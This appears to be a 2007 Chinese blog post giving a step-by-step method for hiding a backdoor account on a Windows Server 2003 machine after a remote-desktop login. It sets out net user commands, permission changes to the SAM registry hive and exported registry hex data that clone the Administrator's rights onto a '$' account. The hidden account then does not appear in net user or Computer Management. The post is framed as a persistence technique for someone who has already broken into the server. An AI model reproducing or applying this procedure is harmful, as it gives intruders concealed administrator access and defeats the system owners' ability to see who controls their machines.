查看文章 |
如何在Win2003服务器下彻底的账号隐藏
2007年11月19日 星期一 下午 02:36
如何在Win2003服务器下彻底的账号隐藏
当登陆进3389以后--
先建立 wenping$ 用户
c:\>net user wenping$ 123456 /add //后面加$ 是为了使在 控制台下用 net user 看不到. 然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组, 把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息 现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\wenping$ 查看默认键值为"0x3e8" 相应导出如下 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\wenping$ 为wenping$.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3e8.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键) 用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下 "F"=hex:02,00,01,00,00,00,00,00,50,80,a2,96,08,03,c7,01,00,00,00,00,00,00,00,\
00,d0,24,2b,8a,14,c9,c6,01,00,00,00,00,00,00,00,00,a0,81,18,6e,d3,e0,c6,01,\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,57,00,01,00,00,00,00,\ 00,00,00,00,00,00,00 把其复制后,打开3e8.reg,找到"F"的值,将其删除,然后把上面的那段粘贴. 打开wenping$.reg,把里面的内容,比如这个例子中如下面这段复制 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$]
@=hex(3e8): 回到3e8.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003e8]
"F"=hex:02,00,01,00,00,00,00,00,50,80,a2,96,08,03,c7,01,00,00,00,00,00,00,00,\ 00,d0,24,2b,8a,14,c9,c6,01,00,00,00,00,00,00,00,00,a0,81,18,6e,d3,e0,c6,01,\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,57,00,01,00,00,00,00,\ 00,00,00,00,00,00,00 "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,10,00,00,00,00,00,00,\ 00,cc,00,00,00,00,00,00,00,00,00,00,00,cc,00,00,00,00,00,00,00,00,00,00,00,\ cc,00,00,00,00,00,00,00,00,00,00,00,cc,00,00,00,00,00,00,00,00,00,00,00,cc,\ 00,00,00,00,00,00,00,00,00,00,00,cc,00,00,00,00,00,00,00,00,00,00,00,cc,00,\ 00,00,00,00,00,00,00,00,00,00,cc,00,00,00,00,00,00,00,00,00,00,00,cc,00,00,\ 00,00,00,00,00,00,00,00,00,cc,00,00,00,00,00,00,00,00,00,00,00,cc,00,00,00,\ 08,00,00,00,01,00,00,00,d4,00,00,00,14,00,00,00,00,00,00,00,e8,00,00,00,14,\ 00,00,00,00,00,00,00,fc,00,00,00,04,00,00,00,00,00,00,00,00,01,00,00,04,00,\ 00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\ 00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\ 00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\ 00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\ 00,00,b1,ae,e0,b4,d2,1f,bc,ac,21,d6,31,3c,e8,03,00,00,00,00,18,00,ff,07,0f,\ 00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\ 01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\ 02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,77,00,65,00,6e,00,\ 70,00,69,00,6e,00,67,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c4,35,56,\ 1c,fa,6c,6d,ee,6c,82,9b,02,f4,e9,33,e3,01,00,01,00,95,f0,1b,70,47,b0,0d,6a,\ 9a,98,a2,c7,0f,62,da,f8,01,00,01,00,01,00,01,00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wenping$]
@=hex(3e8): 保存后,将wenping$用户删除 [在导入数据库之前 一定要先删除这个新加的帐号]c:\>net user wenping$ /delete
运行regedit.exe 将我们已经修改好的3e8.reg文件导入. 最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号 然后 注销当前用户 用 wenping$ /123456 登陆 就会是 最高权限了.
03克隆的方法和 2000的克隆 略有点区别 就是我文章的那前一部分.
这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户wenping$, 记着第一次就把密码设置好,不要改密码.负责会失效. |
最近读者:
